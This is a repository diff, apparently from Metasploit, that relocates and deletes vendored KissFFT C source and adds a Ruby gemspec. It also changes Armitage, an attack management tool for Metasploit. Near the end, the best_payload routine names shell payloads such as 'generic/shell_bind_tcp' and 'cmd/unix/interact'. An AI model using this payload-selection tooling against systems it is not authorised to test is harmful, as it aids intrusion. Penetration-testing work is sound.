fprintf(stderr,"Real FFT optimization must be even.\n");
return NULL;
}
nfft >>= 1;
kiss_fft_alloc (nfft, inverse_fft, NULL, &subsize);
memneeded = sizeof(struct kiss_fftr_state) + subsize + sizeof(kiss_fft_cpx) * ( nfft * 3 / 2);
if (lenmem == NULL) {
st = (kiss_fftr_cfg) KISS_FFT_MALLOC (memneeded);
} else {
if (*lenmem >= memneeded)
st = (kiss_fftr_cfg) mem;
*lenmem = memneeded;
}
if (!st)
return NULL;
st->substate = (kiss_fft_cfg) (st + 1); /*just beyond kiss_fftr_state struct */
st->tmpbuf = (kiss_fft_cpx *) (((char *) st->substate) + subsize);
st->super_twiddles = st->tmpbuf + nfft;
kiss_fft_alloc(nfft, inverse_fft, st->substate, &subsize);
for (i = 0; i < nfft/2; ++i) {
double phase =
-3.14159265358979323846264338327 * ((double) (i+1) / nfft + .5);
if (inverse_fft)
phase *= -1;
kf_cexp (st->super_twiddles+i,phase);
}
return st;
}
void kiss_fftr(kiss_fftr_cfg st,const kiss_fft_scalar *timedata,kiss_fft_cpx *freqdata)
{
/* input buffer timedata is stored row-wise */
int k,ncfft;
kiss_fft_cpx fpnk,fpk,f1k,f2k,tw,tdc;
if ( st->substate->inverse) {
fprintf(stderr,"kiss fft usage error: improper alloc\n");
exit(1);
}
ncfft = st->substate->nfft;
/*perform the parallel fft of two real signals packed in real,imag*/
kiss_fft( st->substate , (const kiss_fft_cpx*)timedata, st->tmpbuf );
/* The real part of the DC element of the frequency spectrum in st->tmpbuf
* contains the sum of the even-numbered elements of the input time sequence
* The imag part is the sum of the odd-numbered elements
*
* The sum of tdc.r and tdc.i is the sum of the input time sequence.
* yielding DC of input time sequence
* The difference of tdc.r - tdc.i is the sum of the input (dot product) [1,-1,1,-1...
* yielding Nyquist bin of input time sequence
*/
tdc.r = st->tmpbuf[0].r;
tdc.i = st->tmpbuf[0].i;
C_FIXDIV(tdc,2);
CHECK_OVERFLOW_OP(tdc.r ,+, tdc.i);
CHECK_OVERFLOW_OP(tdc.r ,-, tdc.i);
freqdata[0].r = tdc.r + tdc.i;
freqdata[ncfft].r = tdc.r - tdc.i;
#ifdef USE_SIMD
freqdata[ncfft].i = freqdata[0].i = _mm_set1_ps(0);
#else
freqdata[ncfft].i = freqdata[0].i = 0;
#endif
for ( k=1;k <= ncfft/2 ; ++k ) {
fpk = st->tmpbuf[k];
fpnk.r = st->tmpbuf[ncfft-k].r;
fpnk.i = - st->tmpbuf[ncfft-k].i;
C_FIXDIV(fpk,2);
C_FIXDIV(fpnk,2);
C_ADD( f1k, fpk , fpnk );
C_SUB( f2k, fpk , fpnk );
C_MUL( tw , f2k , st->super_twiddles[k-1]);
freqdata[k].r = HALF_OF(f1k.r + tw.r);
freqdata[k].i = HALF_OF(f1k.i + tw.i);
freqdata[ncfft-k].r = HALF_OF(f1k.r - tw.r);
freqdata[ncfft-k].i = HALF_OF(tw.i - f1k.i);
}
}
void kiss_fftri(kiss_fftr_cfg st,const kiss_fft_cpx *freqdata,kiss_fft_scalar *timedata)
{
/* input buffer timedata is stored row-wise */
int k, ncfft;
if (st->substate->inverse == 0) {
fprintf (stderr, "kiss fft usage error: improper alloc\n");
exit (1);
}
ncfft = st->substate->nfft;
st->tmpbuf[0].r = freqdata[0].r + freqdata[ncfft].r;
st->tmpbuf[0].i = freqdata[0].r - freqdata[ncfft].r;
C_FIXDIV(st->tmpbuf[0],2);
for (k = 1; k <= ncfft / 2; ++k) {
kiss_fft_cpx fk, fnkc, fek, fok, tmp;
fk = freqdata[k];
fnkc.r = freqdata[ncfft - k].r;
fnkc.i = -freqdata[ncfft - k].i;
C_FIXDIV( fk , 2 );
C_FIXDIV( fnkc , 2 );
C_ADD (fek, fk, fnkc);
C_SUB (tmp, fk, fnkc);
C_MUL (fok, tmp, st->super_twiddles[k-1]);
C_ADD (st->tmpbuf[k], fek, fok);
C_SUB (st->tmpbuf[ncfft - k], fek, fok);
#ifdef USE_SIMD
st->tmpbuf[ncfft - k].i *= _mm_set1_ps(-1.0);
#else
st->tmpbuf[ncfft - k].i *= -1;
#endif
}
kiss_fft (st->substate, st->tmpbuf, (kiss_fft_cpx *) timedata);
}

0
external/ruby-kissfft/kiss_fftr.h → external/ruby-kissfft/ext/kissfft/kiss_fftr.h vendored
View File

0
external/ruby-kissfft/main.c → external/ruby-kissfft/ext/kissfft/main.c vendored
View File

427
external/ruby-kissfft/kiss_fft.c vendored
View File

@ -1,427 +0,0 @@
/*
Copyright (c) 2003-2004, Mark Borgerding
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "_kiss_fft_guts.h"
/* The guts header contains all the multiplication and addition macros that are defined for
fixed or floating point complex numbers. It also delares the kf_ internal functions.
*/
static kiss_fft_cpx *scratchbuf=NULL;
static size_t nscratchbuf=0;
static kiss_fft_cpx *tmpbuf=NULL;
static size_t ntmpbuf=0;
#define CHECKBUF(buf,nbuf,n) \
do { \
if ( nbuf < (size_t)(n) ) {\
free(buf); \
buf = (kiss_fft_cpx*)KISS_FFT_MALLOC(sizeof(kiss_fft_cpx)*(n)); \
nbuf = (size_t)(n); \
} \
}while(0)
static void kf_bfly2(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
int m
)
{
kiss_fft_cpx * Fout2;
kiss_fft_cpx * tw1 = st->twiddles;
kiss_fft_cpx t;
Fout2 = Fout + m;
do{
C_FIXDIV(*Fout,2); C_FIXDIV(*Fout2,2);
C_MUL (t, *Fout2 , *tw1);
tw1 += fstride;
C_SUB( *Fout2 , *Fout , t );
C_ADDTO( *Fout , t );
++Fout2;
++Fout;
}while (--m);
}
static void kf_bfly4(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
const size_t m
)
{
kiss_fft_cpx *tw1,*tw2,*tw3;
kiss_fft_cpx scratch[6];
size_t k=m;
const size_t m2=2*m;
const size_t m3=3*m;
tw3 = tw2 = tw1 = st->twiddles;
do {
C_FIXDIV(*Fout,4); C_FIXDIV(Fout[m],4); C_FIXDIV(Fout[m2],4); C_FIXDIV(Fout[m3],4);
C_MUL(scratch[0],Fout[m] , *tw1 );
C_MUL(scratch[1],Fout[m2] , *tw2 );
C_MUL(scratch[2],Fout[m3] , *tw3 );
C_SUB( scratch[5] , *Fout, scratch[1] );
C_ADDTO(*Fout, scratch[1]);
C_ADD( scratch[3] , scratch[0] , scratch[2] );
C_SUB( scratch[4] , scratch[0] , scratch[2] );
C_SUB( Fout[m2], *Fout, scratch[3] );
tw1 += fstride;
tw2 += fstride*2;
tw3 += fstride*3;
C_ADDTO( *Fout , scratch[3] );
if(st->inverse) {
Fout[m].r = scratch[5].r - scratch[4].i;
Fout[m].i = scratch[5].i + scratch[4].r;
Fout[m3].r = scratch[5].r + scratch[4].i;
Fout[m3].i = scratch[5].i - scratch[4].r;
}else{
Fout[m].r = scratch[5].r + scratch[4].i;
Fout[m].i = scratch[5].i - scratch[4].r;
Fout[m3].r = scratch[5].r - scratch[4].i;
Fout[m3].i = scratch[5].i + scratch[4].r;
}
++Fout;
}while(--k);
}
static void kf_bfly3(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
size_t m
)
{
size_t k=m;
const size_t m2 = 2*m;
kiss_fft_cpx *tw1,*tw2;
kiss_fft_cpx scratch[5];
kiss_fft_cpx epi3;
epi3 = st->twiddles[fstride*m];
tw1=tw2=st->twiddles;
do{
C_FIXDIV(*Fout,3); C_FIXDIV(Fout[m],3); C_FIXDIV(Fout[m2],3);
C_MUL(scratch[1],Fout[m] , *tw1);
C_MUL(scratch[2],Fout[m2] , *tw2);
C_ADD(scratch[3],scratch[1],scratch[2]);
C_SUB(scratch[0],scratch[1],scratch[2]);
tw1 += fstride;
tw2 += fstride*2;
Fout[m].r = Fout->r - HALF_OF(scratch[3].r);
Fout[m].i = Fout->i - HALF_OF(scratch[3].i);
C_MULBYSCALAR( scratch[0] , epi3.i );
C_ADDTO(*Fout,scratch[3]);
Fout[m2].r = Fout[m].r + scratch[0].i;
Fout[m2].i = Fout[m].i - scratch[0].r;
Fout[m].r -= scratch[0].i;
Fout[m].i += scratch[0].r;
++Fout;
}while(--k);
}
static void kf_bfly5(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
int m
)
{
kiss_fft_cpx *Fout0,*Fout1,*Fout2,*Fout3,*Fout4;
int u;
kiss_fft_cpx scratch[13];
kiss_fft_cpx * twiddles = st->twiddles;
kiss_fft_cpx *tw;
kiss_fft_cpx ya,yb;
ya = twiddles[fstride*m];
yb = twiddles[fstride*2*m];
Fout0=Fout;
Fout1=Fout0+m;
Fout2=Fout0+2*m;
Fout3=Fout0+3*m;
Fout4=Fout0+4*m;
tw=st->twiddles;
for ( u=0; u<m; ++u ) {
C_FIXDIV( *Fout0,5); C_FIXDIV( *Fout1,5); C_FIXDIV( *Fout2,5); C_FIXDIV( *Fout3,5); C_FIXDIV( *Fout4,5);
scratch[0] = *Fout0;
C_MUL(scratch[1] ,*Fout1, tw[u*fstride]);
C_MUL(scratch[2] ,*Fout2, tw[2*u*fstride]);
C_MUL(scratch[3] ,*Fout3, tw[3*u*fstride]);
C_MUL(scratch[4] ,*Fout4, tw[4*u*fstride]);
C_ADD( scratch[7],scratch[1],scratch[4]);
C_SUB( scratch[10],scratch[1],scratch[4]);
C_ADD( scratch[8],scratch[2],scratch[3]);
C_SUB( scratch[9],scratch[2],scratch[3]);
Fout0->r += scratch[7].r + scratch[8].r;
Fout0->i += scratch[7].i + scratch[8].i;
scratch[5].r = scratch[0].r + S_MUL(scratch[7].r,ya.r) + S_MUL(scratch[8].r,yb.r);
scratch[5].i = scratch[0].i + S_MUL(scratch[7].i,ya.r) + S_MUL(scratch[8].i,yb.r);
scratch[6].r = S_MUL(scratch[10].i,ya.i) + S_MUL(scratch[9].i,yb.i);
scratch[6].i = -S_MUL(scratch[10].r,ya.i) - S_MUL(scratch[9].r,yb.i);
C_SUB(*Fout1,scratch[5],scratch[6]);
C_ADD(*Fout4,scratch[5],scratch[6]);
scratch[11].r = scratch[0].r + S_MUL(scratch[7].r,yb.r) + S_MUL(scratch[8].r,ya.r);
scratch[11].i = scratch[0].i + S_MUL(scratch[7].i,yb.r) + S_MUL(scratch[8].i,ya.r);
scratch[12].r = - S_MUL(scratch[10].i,yb.i) + S_MUL(scratch[9].i,ya.i);
scratch[12].i = S_MUL(scratch[10].r,yb.i) - S_MUL(scratch[9].r,ya.i);
C_ADD(*Fout2,scratch[11],scratch[12]);
C_SUB(*Fout3,scratch[11],scratch[12]);
++Fout0;++Fout1;++Fout2;++Fout3;++Fout4;
}
}
/* perform the butterfly for one stage of a mixed radix FFT */
static void kf_bfly_generic(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
int m,
int p
)
{
int u,k,q1,q;
kiss_fft_cpx * twiddles = st->twiddles;
kiss_fft_cpx t;
int Norig = st->nfft;
CHECKBUF(scratchbuf,nscratchbuf,p);
for ( u=0; u<m; ++u ) {
k=u;
for ( q1=0 ; q1<p ; ++q1 ) {
scratchbuf[q1] = Fout[ k ];
C_FIXDIV(scratchbuf[q1],p);
k += m;
}
k=u;
for ( q1=0 ; q1<p ; ++q1 ) {
int twidx=0;
Fout[ k ] = scratchbuf[0];
for (q=1;q<p;++q ) {
twidx += fstride * k;
if (twidx>=Norig) twidx-=Norig;
C_MUL(t,scratchbuf[q] , twiddles[twidx] );
C_ADDTO( Fout[ k ] ,t);
}
k += m;
}
}
}
static
void kf_work(
kiss_fft_cpx * Fout,
const kiss_fft_cpx * f,
const size_t fstride,
int in_stride,
int * factors,
const kiss_fft_cfg st
)
{
kiss_fft_cpx * Fout_beg=Fout;
const int p=*factors++; /* the radix */
const int m=*factors++; /* stage's fft length/p */
const kiss_fft_cpx * Fout_end = Fout + p*m;
#ifdef _OPENMP
// use openmp extensions at the
// top-level (not recursive)
if (fstride==1) {
int k;
// execute the p different work units in different threads
# pragma omp parallel for
for (k=0;k<p;++k)
kf_work( Fout +k*m, f+ fstride*in_stride*k,fstride*p,in_stride,factors,st);
// all threads have joined by this point
switch (p) {
case 2: kf_bfly2(Fout,fstride,st,m); break;
case 3: kf_bfly3(Fout,fstride,st,m); break;
case 4: kf_bfly4(Fout,fstride,st,m); break;
case 5: kf_bfly5(Fout,fstride,st,m); break;
default: kf_bfly_generic(Fout,fstride,st,m,p); break;
}
return;
}
#endif
if (m==1) {
do{
*Fout = *f;
f += fstride*in_stride;
}while(++Fout != Fout_end );
}else{
do{
// recursive call:
// DFT of size m*p performed by doing
// p instances of smaller DFTs of size m,
// each one takes a decimated version of the input
kf_work( Fout , f, fstride*p, in_stride, factors,st);
f += fstride*in_stride;
}while( (Fout += m) != Fout_end );
}
Fout=Fout_beg;
// recombine the p smaller DFTs
switch (p) {
case 2: kf_bfly2(Fout,fstride,st,m); break;
case 3: kf_bfly3(Fout,fstride,st,m); break;
case 4: kf_bfly4(Fout,fstride,st,m); break;
case 5: kf_bfly5(Fout,fstride,st,m); break;
default: kf_bfly_generic(Fout,fstride,st,m,p); break;
}
}
/* facbuf is populated by p1,m1,p2,m2, ...
where
p[i] * m[i] = m[i-1]
m0 = n */
static
void kf_factor(int n,int * facbuf)
{
int p=4;
double floor_sqrt;
floor_sqrt = floor( sqrt((double)n) );
/*factor out powers of 4, powers of 2, then any remaining primes */
do {
while (n % p) {
switch (p) {
case 4: p = 2; break;
case 2: p = 3; break;
default: p += 2; break;
}
if (p > floor_sqrt)
p = n; /* no more factors, skip to end */
}
n /= p;
*facbuf++ = p;
*facbuf++ = n;
} while (n > 1);
}
/*
*
* User-callable function to allocate all necessary storage space for the fft.
*
* The return value is a contiguous block of memory, allocated with malloc. As such,
* It can be freed with free(), rather than a kiss_fft-specific function.
* */
kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem )
{
kiss_fft_cfg st=NULL;
size_t memneeded = sizeof(struct kiss_fft_state)
+ sizeof(kiss_fft_cpx)*(nfft-1); /* twiddle factors*/
if ( lenmem==NULL ) {
st = ( kiss_fft_cfg)KISS_FFT_MALLOC( memneeded );
}else{
if (mem != NULL && *lenmem >= memneeded)
st = (kiss_fft_cfg)mem;
*lenmem = memneeded;
}
if (st) {
int i;
st->nfft=nfft;
st->inverse = inverse_fft;
for (i=0;i<nfft;++i) {
const double pi=3.141592653589793238462643383279502884197169399375105820974944;
double phase = -2*pi*i / nfft;
if (st->inverse)
phase *= -1;
kf_cexp(st->twiddles+i, phase );
}
kf_factor(nfft,st->factors);
}
return st;
}
void kiss_fft_stride(kiss_fft_cfg st,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int in_stride)
{
if (fin == fout) {
CHECKBUF(tmpbuf,ntmpbuf,st->nfft);
kf_work(tmpbuf,fin,1,in_stride, st->factors,st);
memcpy(fout,tmpbuf,sizeof(kiss_fft_cpx)*st->nfft);
}else{
kf_work( fout, fin, 1,in_stride, st->factors,st );
}
}
void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout)
{
kiss_fft_stride(cfg,fin,fout,1);
}
/* not really necessary to call, but if someone is doing in-place ffts, they may want to free the
buffers from CHECKBUF
*/
void kiss_fft_cleanup(void)
{
free(scratchbuf);
scratchbuf = NULL;
nscratchbuf=0;
free(tmpbuf);
tmpbuf=NULL;
ntmpbuf=0;
}
int kiss_fft_next_fast_size(int n)
{
while(1) {
int m=n;
while ( (m%2) == 0 ) m/=2;
while ( (m%3) == 0 ) m/=3;
while ( (m%5) == 0 ) m/=5;
if (m<=1)
break; /* n is completely factorable by twos, threes, and fives */
n++;
}
return n;
}

123
external/ruby-kissfft/kiss_fft.h vendored
View File

@ -1,123 +0,0 @@
#ifndef KISS_FFT_H
#define KISS_FFT_H
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <string.h>
#include <malloc.h>
#ifdef __cplusplus
extern "C" {
#endif
/*
ATTENTION!
If you would like a :
-- a utility that will handle the caching of fft objects
-- real-only (no imaginary time component ) FFT
-- a multi-dimensional FFT
-- a command-line utility to perform ffts
-- a command-line utility to perform fast-convolution filtering
Then see kfc.h kiss_fftr.h kiss_fftnd.h fftutil.c kiss_fastfir.c
in the tools/ directory.
*/
#ifdef USE_SIMD
# include <xmmintrin.h>
# define kiss_fft_scalar __m128
#define KISS_FFT_MALLOC(nbytes) memalign(16,nbytes)
#else
#define KISS_FFT_MALLOC malloc
#endif
#ifdef FIXED_POINT
#include <sys/types.h>
# if (FIXED_POINT == 32)
# define kiss_fft_scalar int32_t
# else
# define kiss_fft_scalar int16_t
# endif
#else
# ifndef kiss_fft_scalar
/* default is float */
# define kiss_fft_scalar float
# endif
#endif
typedef struct {
kiss_fft_scalar r;
kiss_fft_scalar i;
}kiss_fft_cpx;
typedef struct kiss_fft_state* kiss_fft_cfg;
/*
* kiss_fft_alloc
*
* Initialize a FFT (or IFFT) algorithm's cfg/state buffer.
*
* typical usage: kiss_fft_cfg mycfg=kiss_fft_alloc(1024,0,NULL,NULL);
*
* The return value from fft_alloc is a cfg buffer used internally
* by the fft routine or NULL.
*
* If lenmem is NULL, then kiss_fft_alloc will allocate a cfg buffer using malloc.
* The returned value should be free()d when done to avoid memory leaks.
*
* The state can be placed in a user supplied buffer 'mem':
* If lenmem is not NULL and mem is not NULL and *lenmem is large enough,
* then the function places the cfg in mem and the size used in *lenmem
* and returns mem.
*
* If lenmem is not NULL and ( mem is NULL or *lenmem is not large enough),
* then the function returns NULL and places the minimum cfg
* buffer size in *lenmem.
* */
kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem);
/*
* kiss_fft(cfg,in_out_buf)
*
* Perform an FFT on a complex input buffer.
* for a forward FFT,
* fin should be f[0] , f[1] , ... ,f[nfft-1]
* fout will be F[0] , F[1] , ... ,F[nfft-1]
* Note that each element is complex and can be accessed like
f[k].r and f[k].i
* */
void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout);
/*
A more generic version of the above function. It reads its input from every Nth sample.
* */
void kiss_fft_stride(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int fin_stride);
/* If kiss_fft_alloc allocated a buffer, it is one contiguous
buffer and can be simply free()d when no longer needed*/
#define kiss_fft_free free
/*
Cleans up some memory that gets managed internally. Not necessary to call, but it might clean up
your compiler output to call this before you exit.
*/
void kiss_fft_cleanup(void);
/*
* Returns the smallest integer k, such that k>=n and k has only "fast" factors (2,3,5)
*/
int kiss_fft_next_fast_size(int n);
/* for real ffts, we need an even size */
#define kiss_fftr_next_fast_size_real(n) \
(kiss_fft_next_fast_size( ((n)+1)>>1)<<1)
#ifdef __cplusplus
}
#endif
#endif

159
external/ruby-kissfft/kiss_fftr.c vendored
View File

@ -1,159 +0,0 @@
/*
Copyright (c) 2003-2004, Mark Borgerding
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "kiss_fftr.h"
#include "_kiss_fft_guts.h"
struct kiss_fftr_state{
kiss_fft_cfg substate;
kiss_fft_cpx * tmpbuf;
kiss_fft_cpx * super_twiddles;
#ifdef USE_SIMD
long pad;
#endif
};
kiss_fftr_cfg kiss_fftr_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem)
{
int i;
kiss_fftr_cfg st = NULL;
size_t subsize, memneeded;
if (nfft & 1) {
fprintf(stderr,"Real FFT optimization must be even.\n");
return NULL;
}
nfft >>= 1;
kiss_fft_alloc (nfft, inverse_fft, NULL, &subsize);
memneeded = sizeof(struct kiss_fftr_state) + subsize + sizeof(kiss_fft_cpx) * ( nfft * 3 / 2);
if (lenmem == NULL) {
st = (kiss_fftr_cfg) KISS_FFT_MALLOC (memneeded);
} else {
if (*lenmem >= memneeded)
st = (kiss_fftr_cfg) mem;
*lenmem = memneeded;
}
if (!st)
return NULL;
st->substate = (kiss_fft_cfg) (st + 1); /*just beyond kiss_fftr_state struct */
st->tmpbuf = (kiss_fft_cpx *) (((char *) st->substate) + subsize);
st->super_twiddles = st->tmpbuf + nfft;
kiss_fft_alloc(nfft, inverse_fft, st->substate, &subsize);
for (i = 0; i < nfft/2; ++i) {
double phase =
-3.14159265358979323846264338327 * ((double) (i+1) / nfft + .5);
if (inverse_fft)
phase *= -1;
kf_cexp (st->super_twiddles+i,phase);
}
return st;
}
void kiss_fftr(kiss_fftr_cfg st,const kiss_fft_scalar *timedata,kiss_fft_cpx *freqdata)
{
/* input buffer timedata is stored row-wise */
int k,ncfft;
kiss_fft_cpx fpnk,fpk,f1k,f2k,tw,tdc;
if ( st->substate->inverse) {
fprintf(stderr,"kiss fft usage error: improper alloc\n");
exit(1);
}
ncfft = st->substate->nfft;
/*perform the parallel fft of two real signals packed in real,imag*/
kiss_fft( st->substate , (const kiss_fft_cpx*)timedata, st->tmpbuf );
/* The real part of the DC element of the frequency spectrum in st->tmpbuf
* contains the sum of the even-numbered elements of the input time sequence
* The imag part is the sum of the odd-numbered elements
*
* The sum of tdc.r and tdc.i is the sum of the input time sequence.
* yielding DC of input time sequence
* The difference of tdc.r - tdc.i is the sum of the input (dot product) [1,-1,1,-1...
* yielding Nyquist bin of input time sequence
*/
tdc.r = st->tmpbuf[0].r;
tdc.i = st->tmpbuf[0].i;
C_FIXDIV(tdc,2);
CHECK_OVERFLOW_OP(tdc.r ,+, tdc.i);
CHECK_OVERFLOW_OP(tdc.r ,-, tdc.i);
freqdata[0].r = tdc.r + tdc.i;
freqdata[ncfft].r = tdc.r - tdc.i;
#ifdef USE_SIMD
freqdata[ncfft].i = freqdata[0].i = _mm_set1_ps(0);
#else
freqdata[ncfft].i = freqdata[0].i = 0;
#endif
for ( k=1;k <= ncfft/2 ; ++k ) {
fpk = st->tmpbuf[k];
fpnk.r = st->tmpbuf[ncfft-k].r;
fpnk.i = - st->tmpbuf[ncfft-k].i;
C_FIXDIV(fpk,2);
C_FIXDIV(fpnk,2);
C_ADD( f1k, fpk , fpnk );
C_SUB( f2k, fpk , fpnk );
C_MUL( tw , f2k , st->super_twiddles[k-1]);
freqdata[k].r = HALF_OF(f1k.r + tw.r);
freqdata[k].i = HALF_OF(f1k.i + tw.i);
freqdata[ncfft-k].r = HALF_OF(f1k.r - tw.r);
freqdata[ncfft-k].i = HALF_OF(tw.i - f1k.i);
}
}
void kiss_fftri(kiss_fftr_cfg st,const kiss_fft_cpx *freqdata,kiss_fft_scalar *timedata)
{
/* input buffer timedata is stored row-wise */
int k, ncfft;
if (st->substate->inverse == 0) {
fprintf (stderr, "kiss fft usage error: improper alloc\n");
exit (1);
}
ncfft = st->substate->nfft;
st->tmpbuf[0].r = freqdata[0].r + freqdata[ncfft].r;
st->tmpbuf[0].i = freqdata[0].r - freqdata[ncfft].r;
C_FIXDIV(st->tmpbuf[0],2);
for (k = 1; k <= ncfft / 2; ++k) {
kiss_fft_cpx fk, fnkc, fek, fok, tmp;
fk = freqdata[k];
fnkc.r = freqdata[ncfft - k].r;
fnkc.i = -freqdata[ncfft - k].i;
C_FIXDIV( fk , 2 );
C_FIXDIV( fnkc , 2 );
C_ADD (fek, fk, fnkc);
C_SUB (tmp, fk, fnkc);
C_MUL (fok, tmp, st->super_twiddles[k-1]);
C_ADD (st->tmpbuf[k], fek, fok);
C_SUB (st->tmpbuf[ncfft - k], fek, fok);
#ifdef USE_SIMD
st->tmpbuf[ncfft - k].i *= _mm_set1_ps(-1.0);
#else
st->tmpbuf[ncfft - k].i *= -1;
#endif
}
kiss_fft (st->substate, st->tmpbuf, (kiss_fft_cpx *) timedata);
}

16
external/ruby-kissfft/kissfft.gemspec vendored Normal file
View File

@ -0,0 +1,16 @@
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = "kissfft"
s.version = "0.0.1"
s.authors = ["HD Moore"]
s.email = ["hdm@rapid7.com"]
s.homepage = ""
s.summary = %q{Ruby wrapper around the KisFFT library for performing FFTs}
s.description = %q{Provides access to the KissFFT library for performing fast-fourier transforms from Ruby }
s.files = Dir.glob('lib/**/*.rb') + Dir.glob('ext/**/*.{c,h,rb}') + [ "LICENSE" ]
s.test_files = Dir.glob('test/**/*.{rb,data}')
s.extensions = [ 'ext/kissfft/extconf.rb' ]
s.require_paths = ["lib"]
end

0
external/ruby-kissfft/sample.data → external/ruby-kissfft/tests/sample.data vendored
View File

0
external/ruby-kissfft/test_kissfft.rb → external/ruby-kissfft/tests/test_kissfft.rb vendored
View File

2
external/source/armitage/resources/about.html vendored
View File

@ -3,7 +3,7 @@
<center><h1>Armitage 1.44</h1></center>
<p>An attack management tool for Metasploit&reg;
<br />Release: 5 Sept 12</p>
<br />Release: 26 Nov 12</p>
<br />
<p>Developed by:</p>

7
external/source/armitage/scripts-cortana/internal.sl vendored
View File

@ -550,6 +550,11 @@ sub data_delete {
call("db.key_clear", $1);
}
# data_clear('key') -- clears all data associated with the specified key
sub data_clear {
data_delete($1);
}
# data_add('key', $object) -- appends value into the database...
sub data_add {
local('$buffer $data');
@ -860,7 +865,7 @@ sub file_content {
}
else {
local('%r');
%r = call("armitage.download", $1);
%r = call("armitage.download_nodelete", $1);
return %r['data'];
}
}

59
external/source/armitage/scripts/attacks.sl vendored
View File

@ -349,6 +349,9 @@ sub best_payload {
else if ("java/jsp_shell_bind_tcp" in $compatible) {
return "java/jsp_shell_bind_tcp";
}
else if ("cmd/unix/interact" in $compatible) {
return "cmd/unix/interact";
}
else {
return "generic/shell_bind_tcp";
}
@ -620,6 +623,34 @@ sub host_attack_items {
}
}
sub chooseSession {
local('@data $sid $data $host $hdata $temp $tablef');
# obtain a list of sessions
foreach $host (keys(%hosts)) {
foreach $sid => $data (getSessions($host)) {
$temp = copy($data);
$temp['sid'] = $sid;
push(@data, $temp);
}
}
# sort the session data
@data = sort({ return $1['sid'] <=> $2['sid']; }, @data);
# update the table widths
$tablef = {
[[$1 getColumn: "sid"] setPreferredWidth: 100];
[[$1 getColumn: "session_host"] setPreferredWidth: 300];
[[$1 getColumn: "info"] setPreferredWidth: 1024];
};
# let the user choose a session
quickListDialog("Choose a session", "Select", @("sid", "sid", "session_host", "info"), @data, $width => 640, $height => 240, lambda({
[$call : $1];
}, $call => $4), \$tablef);
}
sub addFileListener {
local('$table $model $actions');
($table, $model, $actions) = @_;
@ -649,33 +680,7 @@ sub addFileListener {
$actions["WORDLIST"] = $actions["*FILE*"];
# set up an action to choose a session
$actions["SESSION"] = {
local('@data $sid $data $host $hdata $temp $tablef');
# obtain a list of sessions
foreach $host (keys(%hosts)) {
foreach $sid => $data (getSessions($host)) {
$temp = copy($data);
$temp['sid'] = $sid;
push(@data, $temp);
}
}
# sort the session data
@data = sort({ return $1['sid'] <=> $2['sid']; }, @data);
# update the table widths
$tablef = {
[[$1 getColumn: "sid"] setPreferredWidth: 100];
[[$1 getColumn: "session_host"] setPreferredWidth: 300];
[[$1 getColumn: "info"] setPreferredWidth: 1024];
};
# let the user choose a session
